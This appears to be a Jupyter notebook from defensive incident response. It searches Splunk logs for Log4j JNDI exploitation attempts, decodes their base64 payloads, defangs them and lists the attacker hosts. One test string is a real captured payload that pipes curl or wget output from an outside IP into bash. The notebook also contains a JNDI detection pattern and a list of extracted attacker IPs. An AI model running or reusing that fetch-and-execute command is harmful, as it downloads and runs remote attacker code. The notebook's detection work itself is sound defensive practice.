In [91]:
''' Make a report of payloads delivered with log4j http gets.
    See search_log4j_payload.py
'''

import base64
import csv
import pandas as pd
import numpy as np
import pprint
import urllib.request, urllib.parse, urllib.error
import httplib2
import getpass
import sys
from time import sleep
import splunklib.results as results
import splunklib.client as client
pp = pprint.PrettyPrinter()

fn = "log64_attempts.12-13-2012.csv"

def defang_ip(str):
    pat = re.compile(r"((?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3}))")
    new_str = pat.sub(r"?\1", str)
    return new_str
def defang_curl(str):
    pat = re.compile(r"(curl)")
    new_str = pat.sub(r"?\1", str)
    return new_str
def defang_wget(str):
    pat = re.compile(r"(wget)")
    new_str = pat.sub(r"?\1", str)
    return new_str
def defang_http(str):
    pat = re.compile(r"(http?s)")
    new_str = pat.sub(r"?\1", str)
    return new_str
def defang_bash(str):
    pat = re.compile(r"(bash)")
    new_str = pat.sub(r"?\1", str)
    return new_str
def defang_host(str):
    pat = re.compile(r"https?:\/\/([^\/:]+)")
    new_string = pat.sub(r"?\1", str)
    return new_string
def defang(str):
    return defang_host(defang_bash(defang_http(defang_wget(defang_curl(defang_ip(str))))))

def quote_words(str):
    '''quote_words("word1 word2") --> "word1",:word2
       Change string of words into string in quoted csv format
    '''
    return ",".join([ f'"{x}"' for x in str.replace("\n","").split()])

def d64(x):
    ''' d(b64)-->decodes base64 byte string. =Nan if there's an error
    '''
    try:
        r = base64.b64decode(x, altchars="-_").decode()
    except:
        r = np.nan
    return r

def make_list(events):
    '''make_list(events)-->list of the splunk events
    ''' 
    lst = []
    for result in results.ResultsReader(events):
        lst.extend(result.values())
    return lst

def list_to_df(lst, columns):
    '''Create a df with n=len(columns) columns from alist
       0th row has items lst[0] lst[1] ... (n-1)th
       lst row has items lst[0+n] lst[1+n] ... lst[(n-1 + n)i
       ... etc
    '''
    num_columns = len(columns)
    len_list    = len(lst)
    
    # Make sure t
    if len_list % num_columns != 0:
        print(f"length of lst ({len_list}) must be even multiple of # of names ({num_columns})")
        return None
    
    # Reshape the list into a list of lists before returning the dataframe
    sublists = [ lst[i:i+num_columns] for i in range(0, len_list, num_columns) ]
    return pd.DataFrame(sublists, columns=columns)

# This job makes a real search and outputs the result.

HOST = "cnsesplunkoperations.svc.ny.gov"
PORT = 8089
USERNAME = "bdk01"
PASSWORD = getpass.getpass()
OWNER = "bdk01"
APP = "search"

# Create a Service instance and log in 
service = client.connect(
    host=HOST,
    port=PORT,
    username=USERNAME,
    password=PASSWORD,
    owner=OWNER,
    app=APP)

# Build a query
# Reminder: earliest_time = "12/13/2021:00:00:00"
earliest_time = "-11d@d"
latest_time ="-10d@d"

idx = '''directory_services_nonprod doh_google_cloud dol_google_cloud dtf_http estreamer
fireeye hcr_google_cloud health_datapower health_network its_google_cloud its_okta
nonprod main miauditlogs os otda_google_cloud vmware webny webny_nonprod wineventlog'''

indexes = f"index IN ({quote_words(idx)})"

match = '''
Base64 Command "${jndi:*}" | rex "\${jndi.*?Base64\/(?<b64>[^}]*?)}.*"'''

stats = '''
| mvexpand b64 | stats values(host) as host earliest(_time) as earliest  by b64 |  mvexpand host 
| convert timeformat="%m/%d/%Y %H:%M:%S" ctime(earliest) as earliest 
| sort host +earliest 
| table host earliest b64'''

query = f"""search earliest={earliest_time}
            latest={latest_time} 
            {indexes} {match} {stats}"""

# searchquery_normal = "search index=main | stats values(sourcetype)"
searchquery_normal = query
# pp.pprint(query)

kwargs_normalsearch = {
#     "earliest_time": "12/09/2021:00:00:00",
#     "latest_time": "-1d@d",
    "search_mode": "normal"
    }

job = service.jobs.create(searchquery_normal, **kwargs_normalsearch)

# A normal search returns the job's SID right away, so we need to poll for completion
while True:
    while not job.is_ready():
        pass
    stats = {"isDone": job["isDone"],
             "doneProgress": float(job["doneProgress"])*100,
              "scanCount": int(job["scanCount"]),
              "eventCount": int(job["eventCount"]),
              "resultCount": int(job["resultCount"])}

    status = ("\r%(doneProgress)03.1f%%   %(scanCount)d scanned   "
              "%(eventCount)d matched   %(resultCount)d results") % stats

    print(f"{status=}")
    sys.stdout.flush()
    if stats["isDone"] == "1":
        sys.stdout.write("\n\nDone!\n\n")
        break
    sleep(2)

# Get the results and display them
# for result in results.ResultsReader(job.results()):
#     print(result)

save_results = job.results()

lst = make_list(save_results)
log = list_to_df(lst, columns=["host", "earliest", "base64_payload"])

# Decode the b64 column into new column, payload
log["raw_payload"] = log.loc[:,"base64_payload"].apply(d64)

# Defang the raw_payload column into new column, payload
log["payload"] = log.loc[:,"raw_payload"].apply(defang)

# Show the result or save the result 
# pp.pprint(log[["host", "earliest", "payload"]])

log[["host", "earliest", "payload"]].to_csv("search_log4j.txt", index=False)

job.cancel()   
sys.stdout.write('\n')



········
status='\r0.0%   0 scanned   0 matched   0 results'
status='\r95.2%   568 scanned   14 matched   0 results'
status='\r100.0%   694 scanned   15 matched   14 results'


Done!



TypeError: expected string or bytes-like object

In [88]:
''' Read report of web payload's and get list of unique source hosts '''
import re
import pandas as pd
import numpy as np
import pprint
pp = pprint.PrettyPrinter()

def fetch_ip(str):
    ''' fetch_ip(str)-->list of ip adresses in string
    '''
    ippat = r"((?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3}))"
    grp = re.findall(ippat, str)
    grp = [] if not grp else grp
    return grp

def fetch_host(cmd):
    httppat = r"https?:\/\/([^\/:]+)"
    grp = re.findall(httppat, cmd)
    return [] if not grp else grp

def main():
    ''' Read report of web payload's and get list of unique source hosts '''

    # read the search results
    fn = "search_log4j.txt"
    log = pd.read_csv(fn)

    # Clean up
    # Drop any rows that contain Nan. e.g. some of the web paylod's 
    # cannot be converted from base64
    log = log.dropna(subset=["payload"]).reset_index(drop=True)

    ## Find the hosts being referenced in the payload's

    hosts = {}

    grp = []
    for cmd in log.payload:
        r1 = fetch_ip(cmd)
        r2 = fetch_host(cmd)
        grp.extend(r1)
        grp.extend(r2)

    hosts = set(grp)


    # str = "(" + " OR ".join([f"SourceIp={x}" for x in hosts]) + ")"
    # str = "(" + " OR ".join([f"{x}" for x in hosts]) + ")"
    # pp.pprint(hosts)
    ##str

    dfhosts = pd.DataFrame(hosts,columns=["host"])
    dfhosts.to_csv("log4j_hosts.csv",index=False)
    
main()


        



In [90]:
dfhosts

Unnamed: 0,host
0,34.96.113.220
1,34.117.138.174
2,34.107.158.85
3,130.211.13.64
4,34.120.105.16
...,...
84,34.149.11.4
85,34.117.238.254
86,34.117.134.36
87,34.117.80.251


In [80]:
def defang_ip(str):
    ''' defang_ip(str)-->change all <ip_adress> in string to ~<ip_address>
    '''
    pat = re.compile(r"((?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3}))")
    new_str = pat.sub(r"~\1", str)
    return new_str
def defang_curl(str):
    pat = re.compile(r"(curl)")
    new_str = pat.sub(r"~\1", str)
    return new_str
def defang_wget(str):
    pat = re.compile(r"(wget)")
    new_str = pat.sub(r"~\1", str)
    return new_str
def defang_http(str):
    pat = re.compile(r"(http?s)")
    new_str = pat.sub(r"~\1", str)
    return new_str
def defang_bash(str):
    pat = re.compile(r"(bash)")
    new_str = pat.sub(r"~\1", str)
    return new_str
def defang(str):
    return defang_bash(defang_http(defang_wget(defang_curl(defang_ip(str)))))
def f(str):
    def g(x):
        pat = re.compile(f"({str})")
        return pat.sub(x, r"~\1") 
    return g

In [77]:
ippat = re.compile(r"((?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3})\.(?:[0-9]{1,3}))", flags=re.M)

str = "(curl -s 195.54.160.149:5874/35.244.242.56:80||wget -q -O- 195.54.160.149:5874/35.244.242.56:80)|bash"

defang_bash(defang_http(defang_wget(defang_curl(defang_ip(str)))))
# defang_curl(str)


'(~curl -s ~195.54.160.149:5874/~35.244.242.56:80||~wget -q -O- ~195.54.160.149:5874/~35.244.242.56:80)|~bash'

In [78]:
ippat = re.compile(r"([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})")
str = "(curl -s 195.54.160.149:5874/35.244.242.56:80||wget -q -O- 195.54.160.149:5874/35.244.242.56:80)|bash"
re.sub(r"([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})", r"ccc\1", str)

'(curl -s ccc195:5874/ccc35:80||wget -q -O- ccc195:5874/ccc35:80)|bash'

In [None]:
f()